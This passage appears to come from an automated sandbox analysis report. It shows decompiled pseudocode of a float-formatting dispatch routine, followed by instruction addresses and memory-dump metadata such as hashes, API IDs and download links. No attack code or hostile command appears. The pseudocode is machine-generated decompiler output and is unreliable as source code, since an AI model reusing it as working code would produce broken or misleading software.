					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                  0x004134e0
                                                                                                                                                  0x004134e6
                                                                                                                                                  0x00413559
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004134ed
                                                                                                                                                  0x004134ed
                                                                                                                                                  0x004134f0
                                                                                                                                                  0x0041350b
                                                                                                                                                  0x0041350e
                                                                                                                                                  0x0041352e
                                                                                                                                                  0x00413540
                                                                                                                                                  0x00413510
                                                                                                                                                  0x00413510
                                                                                                                                                  0x00413513
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00413515
                                                                                                                                                  0x00413527
                                                                                                                                                  0x00413527
                                                                                                                                                  0x00413513
                                                                                                                                                  0x0041355e
                                                                                                                                                  0x00413562
                                                                                                                                                  0x004134f2
                                                                                                                                                  0x0041350a
                                                                                                                                                  0x0041350a
                                                                                                                                                  0x004134f0

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.927137861.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.927223264.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 0000000B.00000002.927239148.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                  • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%